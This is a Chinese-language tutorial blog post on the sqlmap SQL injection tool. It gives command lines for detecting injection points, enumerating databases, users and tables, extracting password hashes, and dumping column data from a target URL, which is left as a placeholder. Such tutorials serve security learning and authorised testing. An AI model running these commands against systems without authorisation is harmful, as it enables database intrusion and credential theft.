渗透工具sqlmap学习

对于网络安全人员来说,掌握渗透工具的使用方法是一项必备的技能。

sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞。它由python语言开发而成,因此运行需要安装python环境。

      • 检测注入点
      • 显示数据库名称
      • 当前的数据库
      • 数据库使用账户
      • 列出数据库用户
      • 数据库账户与密码
      • 列出数据库中的表
      • 列出表中字段
      • 显示字段内容
      • 指定导出特定范围的字段内容

检测注入点

python sqlmap.py -u 请求地址 --batch

-u:指定注入点url

如果注入成功则会显示:
渗透工具sqlmap学习_第1张图片
- 注入参数的请求方式。

- web服务器系统。
- web应用程序技术。
- 数据库类型。

显示数据库名称

一条命令即可曝出该sqlserver中所有数据库名称,命令如下:

python sqlmap.py -u 请求地址 --dbs

–dbs:dbs前面有两条杠,请看清楚。

如果注入成功则会显示:
渗透工具sqlmap学习_第2张图片
- 显示所有数据库名称。

当前的数据库

python sqlmap.py -u 请求地址 --current-db
渗透工具sqlmap学习_第3张图片

数据库使用账户

python sqlmap.py -u 请求地址 --current-user
渗透工具sqlmap学习_第4张图片

列出数据库用户

python sqlmap.py -u 请求地址 --users
渗透工具sqlmap学习_第5张图片

数据库账户与密码

python sqlmap.py -u 请求地址 --passwords
渗透工具sqlmap学习_第6张图片

列出数据库中的表

python sqlmap.py -u 请求地址 -D tourdata --tables
渗透工具sqlmap学习_第7张图片
-D:指定数据库名称
–tables:列出表

列出表中字段

python sqlmap.py -u 请求地址 -D tourdata -T userb --columns
渗透工具sqlmap学习_第8张图片
–columns:指定列出字段

显示字段内容

python sqlmap.py -u 请求地址 -D tourdata -T userb -C 字段A,字段B,字段C --dump

-C :指定要显示的字段
–dump:将结果导出
结果:
渗透工具sqlmap学习_第9张图片

指定导出特定范围的字段内容

python sqlmap.py -u 请求地址 -D A库(数据库名称) -T A表(表名称) -C 字段A(字段名称),字段B,字段C --start 1 --stop 10 --dump

–start:指定开始的行
–stop:指定结束的行
导出数据库A库中的表A表中的字段(字段A,字段B,字段C)中的第1到第10行的数据内容。
渗透工具sqlmap学习_第10张图片

如需了解更多sqlmap资料可以访问官方网站

你可能感兴趣的:(数据库,python,sql注入,网络安全)